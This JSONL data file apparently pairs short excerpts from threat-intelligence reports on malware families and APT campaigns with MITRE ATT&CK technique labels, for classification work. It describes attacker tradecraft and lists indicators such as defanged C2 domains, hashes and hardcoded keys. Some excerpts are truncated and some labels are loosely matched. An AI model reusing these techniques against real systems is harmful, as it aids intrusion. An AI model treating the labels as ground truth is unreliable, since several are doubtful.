{"text1":"Emails dating more than three years prior to malware execution have been included in the collected EmailStorage folder, meaning that there may not be a date limit for the email enumerator. There is a lack of keywords or other limiting pattern by which specific email messages in local mailboxes were targeted for exfiltration. Kroll has identified instances where specific email messages were deleted within the EmailStorage folder. In some instances, the entire EmailStorage folder is deleted once messages have all been exfiltrated. Based on observed cases, there was no evidence that attachments were included in the collected data. Kroll collaborators at the National Cyber Forensics Training Alliance (NCFTA) observed Qakbot samples sending SMTP traffic indicative of outbound spam thread hijackings","labels":"['T1074.001']"}
{"text1":"The experience of dealing with Emotet shows that it will be time well spent. We always recommend that clients adopt a policy that forces users to create passwords that they can remember, but that are hard to guess","labels":"['T1110.001']"}
{"text1":"In the past we have seen others techniques that used Bitcoin blockchain to hide their C&C server IP address, but in this blog we will share an analysis of the new technique","labels":"['T1568']"}
{"text1":"When run, GoldMax decodes (Base64) and decrypts (AES-256) the configuration data to reveal a custom data structure comprised of the following dynamically generated and hardcoded values (delimited by","labels":"['T1140']"}
{"text1":"The first stage logic is performed by \u2018mklgsecondary\u2019 which serves the purpose of downloading a file named \u2018chrome.txt\u2019 from a C2 server using the BITS utility. The downloader modifies the Chrome shortcut using the same method previously described for the Telegram variant. The downloaded PE file (\u2018chrome.txt\u2019\/\u2019mklgchrome\u2019) gets executed each time the user starts Chrome, thereby running the real Chrome application as well as executing the MarkiRAT payload","labels":"['T1197', 'T1105']"}
{"text1":"In the implementation of Flagpro v1.0, if a dialog titled \u201cWindows \u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u201d is displayed when Flagpro accesses to an external site, Flagpro automatically clicks OK button to close the dialog. This handling also works when the dialog is written Chinese and English. It can indicate the targets are Japan, Taiwan, and English-speaking countries. Flagpro v2.0 checks whether both username and password are filled in a dialog as an additional feature before clicking the OK button","labels":"['T1614.001']"}
{"text1":"Zirconium is using what are referred to as web bugs, or web beacons, tied to a domain they purchased and populated with content. Although the domain itself may not have malicious content, the web bug allows Zirconium to check if a user attempted to access the site","labels":"['T1566.002']"}
{"text1":"Once macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup","labels":"['T1053.005', 'T1218.010']"}
{"text1":"Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim\u2019s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine\u2019s %APPDATA% directory. The built-in Windows utility rundll32.exe is then used to load this DLL by the original .lnk file. Unit 42 has observed a total of two variants of Comnie. One of the ways the variants differ is in how they obtain their command and control (C2) information. Both variants make use of third-party online services in an attempt to prevent DNS based blocking of their first stage communications. In older variants, Comnie was found to look for the \u2018++a++\u2019 markers. The example C2s used by older variants of Comnie demonstrates this","labels":"['T1102.002']"}
{"text1":"To inject the OpenSSH server configuration directly into memory, Ebury parses the sshd binary\u2019s code section mapped in the same process looking for two different functions. If it fails, it downgrades security features by disabling SELinux Role-Based Access Control and deactivating PAM modules. When one of the functions is successfully resolved, Ebury will use this when the backdoor is used to tamper with sshd\u2018s configuration","labels":"['T1556.003', 'T1562.001']"}
{"text1":"The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it\u2019s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling \u2018fudpages\u2019, was found during this campaign activity based on their utilization of shared infrastructure. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206","labels":"['T1105']"}
{"text1":"In this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload. Commands in the macro are heavily obfuscated for defense evasion","labels":"['T1027']"}
{"text1":"Icons were often folders, meant to trick targets into thinking they were opening a shortcut to a folder","labels":"['T1036']"}
{"text1":"The main code is run in a separate thread: every 10 minutes, the application contacts the C&C server motivation[.]neighboring[.]site and passes it the computer's identifier in the User-Agent string. The identifier is a SuperFastHash of the system volume serial number and the name of the computer","labels":"['T1082', 'T1029']"}
{"text1":"One significant change between DEATHRANSOM and FIVEHANDS is the use of a memory-only dropper, which upon execution, expects a command line switch of -key followed by the key value necessary to perform decryption of its payload. The payload is stored and encrypted with AES-128 using an IV of \u201c85471kayecaxaubv\u201d. The decrypted FIVEHANDS payload is immediately executed after decryption. To date, Mandiant has only observed encrypted droppers with a common imphash of 8517cf209c905e801241690648f36a97","labels":"['T1140']"}
{"text1":"Before executing the main payload, the QakBot loader will first test the infected system to see if it is a good candidate for infection. Figure 5 below shows a high-level execution flow of the QakBot loader","labels":"['T1518.001', 'T1518.001', 'T1497.001']"}
{"text1":"NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and\u2014in most cases\u2014most effective method, uses a modified version of the Mimikatz tool to steal the user\u2019s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1. In this case, the malware attempts to identify other hosts on the network by checking the compromised system\u2019s IP physical address mapping table. Next, it scans for other systems that are vulnerable to the SMB exploit and installs the malicious payload. Refer to the malware report, MIFR-10130295, for more details on these methods","labels":"['T1210']"}
{"text1":"Tracing the origin of the hidden .mina file showed that it is a copy of an included resource, renamed SubMenu.nib, from the application bundle and where the main backdoor functions were contained. It also has the same links to Lazarus\u2019 Windows and Linux predecessors: the presence of the hardcoded strings c_2910.cls and k_3872.cls. Both strings were previously used during C&C communication to the domain thevagabondsatchel[.]com as the sample storage of the cybercriminal group, as reported by 360 Netlab researchers","labels":"['T1027', 'T1564.001']"}
{"text1":"The threat actor in this case hosted the MSI file on GitHub using a spoofed file extension to look like a PDF","labels":"['T1218.007']"}
{"text1":"The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http:\/\/<c2 domain>\/chk. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName\/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting","labels":"['T1059.005']"}
{"text1":"The name of the local computer that corresponds to the IP address and the name of the port is shown unless the -n parameter is specified. If the port is not yet established, the port number is shown as an asterisk (*). Foreign Address The IP address and port number of the remote computer to which the socket is connected. If the port is not yet established, the port number is shown as an asterisk (*). (state) Indicates the state of a TCP connection. The possible states are as follows: CLOSE_WAIT CLOSED ESTABLISHED FIN_WAIT_1 FIN_WAIT_2 LAST_ACK LISTEN SYN_RECEIVED SYN_SEND TIMED_WAIT For more information about the states of a TCP connection, see RFC 793. Proto The name of the protocol (TCP or UDP). - Local Address The IP address of the local computer and the port number being used. The name of the local computer that corresponds to the IP address and the name of the port is shown unless the -n parameter is specified. If the port is not yet established, the port number is shown as an asterisk (*). - Foreign Address The IP address and port number of the remote computer to which the socket is connected. If the port is not yet established, the port number is shown as an asterisk (*). - - This command is available only if the Internet Protocol (TCP\/IP) protocol is installed as a component in the properties of a network adapter in Network Connections","labels":"['T1049']"}
{"text1":"The most common ports used are, 80, 1985, 1986, and 443. 1985 is the default port for the malware, 1986 is the lazy variation of that port. Port 80 and 443 are the default ports for HTTP and HTTPS traffic. The next most common is port 53. This is used in some of the newer 3.22 and 3.39 samples. After that, the count for each port starts declining sharply","labels":"['T1571']"}
{"text1":"In previous iterations, the Astaroth Trojan campaign used cerutil to download files. In this iteration, they have replaced certutil with BITSAdmin","labels":"['T1105']"}
{"text1":"Then, it encrypts it with 3DES before sending it (figure 28). The _P.Y (\"0295A. 1618C\") method in figure 26 creates the MD5 hash of the string. This hash is used as secret for the 3DES encryption","labels":"['T1560']"}
{"text1":"This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors. The Qualys Research Team recently identified a new Lazarus campaign using employment phishing lures targeting the defence sector. This is thematically similar to other observed variants where Lazarus has posed as defence companies like Northrop Grumman and BAE Systems with job openings. LockHeed Recruitment Lure . The macro uses aliases to rename the APIs that it uses (fig. 5). Other variants have used the UuidFromStringA function to decode the embedded payload and write it to an executable Heap. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap. 8). shellObj is the Wscript.Shell object that the vbs file uses to execute the beacon command. Additional vendors have also identified a variant that uses pcalua.exe. Additional vendors have reported on the current campaign while attributing it to Lazarus. Lazarus continues to evolve its capabilities by utilizing lesser-known shellcode execution techniques and incorporating various lolbins as part of its campaign","labels":"['T1059.003']"}
{"text1":"Afterwards, the persistence file will be created in \/Library\/LaunchDaemons\/ or ~\/Library\/LaunchAgents\/ folder. This persistence file is also set to hidden with a randomly generated file date and time","labels":"['T1543.004', 'T1543.001']"}
{"text1":"Extract the encoded payload. Decrypt the extracted payload. This uses the AES algorithm in CBC mode. Decompress the decrypted payload. This uses the LZMA algorithm. Decrypt the decompressed payload. This is simple XOR with byte key and as such does not impact compression ratio. Execute the decrypted payload as shellcode","labels":"['T1027', 'T1140']"}
{"text1":"This function will either bind the calling process to a port or has the calling process connect to a remote host. The function is called in the following manner","labels":"['T1134.002']"}
{"text1":"The attachment itself is an Microsoft Excel XLS document that contains malicious macro script. The document presents itself as a standard macro document but has all of its text hidden until the victim enables macros. Notably, all of the content text is accessible to the victim even before macros are enabled. However, a white font color is applied to the text to make it appear that the victim must enable macros to access the content. Once the macro is enabled, the content is presented via the following code: ActiveSheet.Range(\"a1:c54\").Font.Color = vbBlack The code above changes the font color to black within the specified cell range and presents the content to the user. On initial inspection, the content appears to be the expected legitimate content, however, closer examination of the document shows several abnormal artifacts that would not exist in a legitimate document. Figure 2 below shows how the delivery document initially looks and the transformation the content undergoes as the macro runs","labels":"['T1204.002']"}
{"text1":"This sample was delivered by a malicious document named \u201cInterview with a north Korean defector\u201d. The macro embedded inside unpacks and executes winload.exe","labels":"['T1204.002']"}
{"text1":"Falcon Intelligence has observed two different methods used to deploy BitPaymer once the domain controllers are compromised. In one instance, only the domain controllers and other critical infrastructure, like payroll servers, were targeted and PowerShell Empire was used to download and execute the BitPaymer malware directly on these servers","labels":"['T1059.001']"}
{"text1":"WIRTE used documents deploying Visual Basic Script (VBS), potentially delivered through spear phishing, decoys with Arabic content, occasionally associated with Palestinian matters","labels":"['T1059.005']"}
{"text1":"Emotet is one of the most widely distributed and actively developed malware families on the crimeware landscape today. Emotet began purely as a banking trojan, but over the years, has continued to evolve and more recently, has been associated with some larger-scale targeted Ryuk ransomware infections. Emotet is commonly delivered via both macro-laden office documents, as well as URL-based spam messages that lead to an eventual infection. It's not uncommon to see Emotet reuse of some of the command and control (C2) servers over more extended periods. The goal of Emotet, as is the case with crimeware-based threats, is monetary. Attackers use Emotet to deliver modular payloads it can use to monetize infections","labels":"['T1571']"}
{"text1":"Once the target\u2019s machine is compromised, the attacker first enumerates all processes running in the system and all services. Then the attacker looks for all administrator accounts on both the local machine and the network. This reflects the Poseidon Group\u2019s familiarity with Windows network administration","labels":"['T1057', 'T1007']"}
{"text1":"The downloaded Stage3 is written in C# as in Stage2, and an obfuscation tool called Eazfuscator is detected by exeinfoPE","labels":"['T1027']"}
{"text1":"The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. According to Group-IB researchers, APT41 usually parks their domains for some time at 127.0.0.1 after their campaigns are over. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry. The contents of the file \"install.bat\" from APT41's This is Not a Test campaign","labels":"['T1547.001']"}
{"text1":"Among infostealers used by the Kimsuky group, some samples have been found that use FTP to download additional malware after logging infected targets to the C&C [14, 15","labels":"['T1059.007', 'T1071.002']"}
{"text1":"Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website, including","labels":"['T1553.002']"}
{"text1":"Win32CmDll.dll first tries to inject the ManagerMain and GuardClient modules into a process with one of the following names: lsass.exe, wininit.exe or lsm.exe. If that fails, it tries to inject into one of the registered windows services processes, excluding processes named spoolsv.exe, ekrn.exe (ESET), avp.exe (Kaspersky) or dllhost.exe. As a last option, if everything else failed, it tries to use the processes taskhost.exe, taskhostw.exe or explorer.exe","labels":"['T1055.001']"}
{"text1":"We have most definitely observed Kimsuky targeting specific individuals \u2014 in fact, up to the present moment \u2014 even going as far as registering Internet domains containing the individual targets' names, the PwC analyst said","labels":"['T1583.001']"}
{"text1":"Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk","labels":"['T1105']"}
{"text1":"In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from \/.ssh\/config, .bash_history, \/.ssh\/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets","labels":"['T1018']"}
{"text1":"The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName\/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what. hex(Environment.UserName\/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are","labels":"['T1059.003']"}
{"text1":"Along the way, HermeticWiper\u2019s more mundane operations provide us with further IOCs to monitor for. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver\u2019s execution starts","labels":"['T1562.006', 'T1112']"}
{"text1":"APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals","labels":"['T1566.002', 'T1204.001']"}
{"text1":"These macro injection modules also have the functionality to tamper with the Microsoft Office macro security settings","labels":"['T1562.001']"}
{"text1":"TClient will use SSL to connect to Tropic Trooper\u2019s C&C server. This allows Tropic Trooper\u2019s operators to easily change\/update the C&C server and configure other values","labels":"['T1573.002']"}
{"text1":"They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command","labels":"['T1560.001']"}
{"text1":"CTU researchers assess with high confidence that IRON RITUAL's intent is long term, covert access to networks of interest for the purposes of espionage and data theft.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool","labels":"['T1195.002']"}
{"text1":"A format string that defaults to \u201cpublic\/Publics\u201d that modifies characteristics of the folder and hide it from the infected user","labels":"['T1564.001']"}
{"text1":"Each targeted file is opened, read, encrypted in memory, and then written to a new file in the malware\u2019s working directory using the filename format <random number>.WNCRYT. The files are then renamed to their original filename followed by the .WINCRY extension and moved to their original directory. The taskdl.exe process launched by the malware periodically deletes the remaining WINCRYT temporary files. The encryption process does not directly overwrite file data, so forensic recovery of file contents may be possible depending on the environment. The entire contents of the file are encrypted and saved with a custom header (see Figure 7","labels":"['T1489']"}
{"text1":"As you can see in Figure 1, the authentication prompt says \u201cConnecting to <redacted>. 0utl00k[.]net\u201d, which is a DarkHydrus C2 server. If the user enters their credentials in this dialog box and presses \u2018Ok\u2019, the credentials are sent to the C2 server via the URL https:\/\/<redacted>.0utl00k[.]net\/download\/template.docx. With the authentication dialog box gone, Word displays the contents of the document, which in this specific case was an empty document. While this document was empty, the authentication prompt\u00a0may have made the targeted user more likely\u00a0to enter their credentials, thinking it\u2019s necessary to view the contents of the document. DarkHydrus also created their C2 domain carefully in an attempt to further trick the targeted user to enter their credentials. Also, the 0utl00k[.]net domain resembles Microsoft\u2019s legitimate \"outlook.com\u201d domain that provides free email services, which also make the user less suspicious and more likely to enter their credentials. Some users may not even notice what domain the dialog states they are connecting to and habitually type their Windows credentials. We found two additional Word documents using the 0utl00k[.]net domain to harvest credentials, seen in Table 1. We first saw these related Word documents in September and November 2017, which suggests that DarkHydrus has been carrying out this credential harvesting campaign for almost a year","labels":"['T1187']"}
{"text1":"The dropper installs the Bisonal EXE file and decoy PDF file. These files are not encrypted and the offset to the EXE and PDF file in the dropper is appended at the end of the dropper file. The file name of the decoy file is based on the dropper file name. The dropper code creates a PDF at the same directory, give the same name with itself to the decoy file, removes .exe and adds .pdf in the code. The dropper also creates two VBS scripts in the %Temp% directory with a random 4 digits hexadecimal name. The other deletes the dropper and the VBS script itself","labels":"['T1070.004']"}
{"text1":"Next, BoomBox AES-encrypts the host information string above using the hardcoded encryption key \u201c123do3y4r378o5t34onf7t3o573tfo73\u201d and initialization vector (IV) value \u201c1233t04p7jn3n4rg\u201d. To masquerade the data as contents of a PDF file, BoomBox prepends and appends the magic markers for PDF to the AES-encrypted host information string above","labels":"['T1036', 'T1027']"}
{"text1":"For example, Monash University, located in Australia, has been a popular Silent Librarian target. Like the overall content of their lures, the subject lines of Silent Librarian phishing emails have remained consistent over time. Phishing Pages . We have identified 127 different domains used to host Silent Librarian phishing sites since 2013. Like a growing number of phishing sites, domains registered by Silent Librarian generally use Freenom top-level domains (TLDs) (.TK, . CF, .GA, .GQ, .ML) because they are available at no cost. Some of the other recent TLDs associated with Silent Librarian domains include .IN, .IR, .INFO, .LINK, and .TOP. Legitimate American\u00a0University Library Login URL (above) . Silent Librarian Phishing URL (January 2018) . The content of Silent Librarian phishing pages is almost identical to the legitimate target sites. The actors likely scrape the original HTML source code from the legitimate library login page, then edit the references to resources used to render the webpage (images, JavaScript, CSS, etc. An analysis of the Silent Librarian kits identified two email accounts that were used to receive compromised victim credentials. Similarly, the credentials stolen in the Silent Librarian phishing attacks we identified were sold on an Iranian website; however, it is not one of the sites specified in the indictment. Using a combination of technical and open source research, we identified another website, Uniaccount[.]ir, that was used to sell the credentials compromised in the Silent Librarian phishing attacks","labels":"['T1598.003']"}
{"text1":"An already public UAC bypass method is included in the binary. It doesn\u2019t matter if the method will work or not since the process will exit. This is one more indication that the tool is still in development and there are plans to expand its capabilities","labels":"['T1548.002']"}
{"text1":"Upon execution, HyperStack undergoes a similar registry key check to Turla\u2019s RPC backdoor and updates the same registry key to determine which named pipes can be accessed anonymously. The HyperStack backdoor first copies itself to C:\\ADSchemeIntegrity.exe and then installs itself with system-level privileges as the service Active Directory Scheme Integrity Service. HyperStack checks for the following registry entry and, when found, adds the name of its communication pipe (\u2018adschemerpc\u2019) to the key value","labels":"['T1112']"}
{"text1":"The adversaries installed the backdoor as a service on the infected machine. They attempted to operate under the radar by naming the service \"Windows Time Service\", like the existing Windows service","labels":"['T1036.004']"}
{"text1":"The use of an initial reconnaissance document allows Inception to profile the target\u2019s computer and potentially customize any subsequent malicious document to exploit known vulnerabilities in unpatched software on the computer","labels":"['T1566.001']"}
{"text1":"The backdoor installer will drop a normal sidebar.exe file (a Windows Gadget tool, a feature already discontinued by Windows), a malicious loader (in \"C:\\ProgramData\\Apple\\Update\\wab32res.dll\"), and an encrypted configuration file","labels":"['T1055.001']"}
{"text1":"Spear phishing, including the use of probably compromised email accounts. Lure documents using CVE-2017-11882 to drop malware. Stolen code signing certificates used to sign malware. Use of bitsadmin.exe to download additional tools. Use of PowerShell to download additional tools. Using C:\\Windows\\Debug and C:\\Perflogs as staging directories. Using Windows Management Instrumentation (WMI) for persistence. Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence","labels":"['T1553.002']"}
{"text1":"After the configuration is parsed, Cardinal RAT will proceed with making attempts at connecting with the C2. Using an example request and response from a C2 server, we can see how this traffic is configured","labels":"['T1560.002']"}
{"text1":"As with every communication with the C2, the script collects and sends information about the target environment including the stack of security solutions installed on the computer and are part of the following list","labels":"['T1518.001']"}
{"text1":"FIN6 also moved laterally to servers in the environment using RDP and configured them as malware \u201cdistribution\u201d servers. Mandiant identified a utility script named kill.bat that was run on systems in the environment. FIN6 automated the deployment of kill.bat and the LockerGoga ransomware using batch script files. FIN6 created a number of BAT files on the malware distribution servers with the naming convention xaa.bat, xab.bat, xac.bat, etc. FIN6 renamed the psexec service name to \u201cmstdc\u201d in order to masquerade as the legitimate Windows executable \u201cmsdtc. Domain administrators have complete control over Windows systems in an Active Directory environment","labels":"['T1036.004']"}
{"text1":"The first stage implant that is nested in the DOTM file, is using triple base64 encoding in the Visual Basic Macro - The extracted DLL (desktop.dat) is packed with the Themida packer attempting to make analysis more difficult","labels":"['T1027.002']"}
{"text1":"Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as","labels":"['T1571']"}
{"text1":"Use command-line interfaces to interact with systems and execute other software (Command and Scripting Interpreter [T1059]) - Use scripts (e.g. VBScript and PowerShell) to speed up operational tasks, reduce the time required to gain access to critical resources, and bypass process monitoring mechanisms by directly interacting with the operating system (OS) at an Application Programming Interface (API) level instead of calling other programs (Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005]) - Rely upon specific user actions, such as opening a malicious email attachment (User Execution [T1204]) - Exploit software vulnerabilities to execute code on a system (Exploitation for Client Execution [T1203]) - Create new services or modify existing services to execute executables, commands, or scripts (System Services: Service Execution [T1569.002]) - Employ the Windows module loader to load Dynamic Link Libraries (DLLs) from arbitrary local paths or arbitrary Universal Naming Convention (UNC) network paths and execute arbitrary code on a system (Shared Modules [T1129]) - Use the Windows API to execute arbitrary code on the victim's system (Native API [T1106]) - Use a system's graphical user interface (GUI) to search for information and execute files (Remote Services [T1021]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task\/Job [T1053]) - Abuse compiled Hypertext Markup Language (HTML) files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001]) - Abuse Windows rundll32.exe to execute binaries, scripts, and Control Panel Item files (.CPL) and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundl32 [T1218.001]) - Exploit cron in Linux and launchd in macOS systems to create pre-scheduled and periodic background jobs (Scheduled Task\/Job: Cron [T1053.003], Scheduled Task\/Job: Launchd [T1053.004","labels":"['T1106', 'T1059.005', 'T1059.001', 'T1053.003', 'T1218.011']"}
{"text1":"To decrypt the configuration data, the malware uses XOR with 25-character keys such as \u201cwaEHleblxiQjoxFJQaIMLdHKz\u201d that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value\u2019s MD5 hash as an initial vector. Among all these random keys once the word \u201csalamati\u201d was also used, which means \u201chealth\u201d in Farsi","labels":"['T1140']"}
{"text1":"Every time the malware runs a command using cmd.exe, the standard output (STDOUT) of the executed command is piped and written to a Google Drive account with the following filename format","labels":"['T1059.003']"}
{"text1":"https:\/\/raw.githubusercontent[.]com\/r1ng\/news\/master\/README.md The malware accesses the URL and decodes the characters between the string \u201c[Rudeltaktik]\u201d and character \u201c!\u201d using BASE64. Rudeltaktik]MTE1LjY4LjQ5LjE3OTo4MA==! UBoatRAT uses a custom command and control protocol to communicate with the attacker\u2019s server. The malware places the string '488' (0x34, 0x38, 0x38 in HEX) at the top of the payload or instruction and encrypts the entire buffer with the static key 0x88 by using simple XOR cipher. Then the network payload always starts with 0xBC, 0xB0, 0xB0","labels":"['T1027']"}
{"text1":"ALL tim nha Chi Ngoc Canada: The shell script containing the main malicious routines - configureDefault.def: The word file displayed during execution","labels":"['T1059.004']"}
{"text1":"shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. Modules used for spreading inside a local network of compromised machines via SMB. tabDll Module used to spread into the network using the EternalRomance exploit. Module used to spread into the network using the EternalRomance exploit","labels":"['T1135']"}
{"text1":"1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 5) The PowerShell script creates a Cobalt Strike stager payload. This PowerShell script also retrieves an XOR-encoded Cobalt Strike beacon payload from an adversary-controlled domain. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant","labels":"['T1059.001']"}
{"text1":"This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched","labels":"['T1543.003']"}
{"text1":"The location of the working directory is determined by the instructions from the remote server. The directory is used as temporary storage for files containing collected data about the compromised computer","labels":"['T1074.001']"}
{"text1":"The winupdate.ps1 script (SHA256: 36862f654c3356d2177b5d35a410c78ff9803d1d7d20da0b82e3d69d640e856e) is the main payload of this attack that we call RogueRobin. Its developer used the open source Invoke-Obfuscation tool to obfuscate this PowerShell script, specifically using the COMPRESS technique offered by Invoke-Obfuscation. Before carrying out any of its functionality the payload checks to see if it is executing in a sandbox. The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment. The specific sandbox checks include","labels":"['T1047', 'T1497.001', 'T1057']"}
{"text1":"The malware used in a DUBNIUM attack is committed to disguising itself as Secure Shell (SSH) tool. The file descriptions and other properties of the malware look convincingly legitimate at first glance","labels":"['T1036.005']"}
{"text1":"The malware next sets out to prevent the victim from stopping the ongoing infection. First, the machine is removed from the Active Directory domain by using WinAPI or WMI. This makes it harder to remotely push any remediation tools to the infected machines","labels":"['T1106']"}
{"text1":"After defining several variables, some of which contain ActiveX objects for file execution and manipulation later, the script uses a function to \u201croll\u201d a random number","labels":"['T1218.001']"}
{"text1":"A macro is executed by the Office document: The macro inflates and creates a ZIP file on the targeted system and executes a Lua script in this archive. The archive contains the Lua payload and luajit, a Lua interpreter for Windows. Here is the script: This script downloads and executes an additional payload","labels":"['T1059']"}
{"text1":"In some previous phishing email campaigns,\u00a0attackers leveraged SendGrid to distribute the initial emails to hide the Google Drive links in the documents behind a SendGrid URL as a way to bypass traditional defences","labels":"['T1204.001']"}
{"text1":"Open malspam with password-protected ZIP attachment. On June 30 and July 1, 2020, we saw indications there may also have been a link to download a ZIP archive instead of an attachment. Extract Microsoft Word document from the password-protected ZIP archive using a unique password from the message text","labels":"['T1566.001']"}
{"text1":"This said macro executes a command to download the first stage payload using msiexec.exe, a Microsoft Installer tool that can download and run a Windows Installer file. The first stage payload is an MSI Installer that was created using an EXE to MSI converter","labels":"['T1218.007']"}
{"text1":"The variable $HL39fjh contains the base64-encoded PowerShell command shown in Figure 2. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload","labels":"['T1027']"}
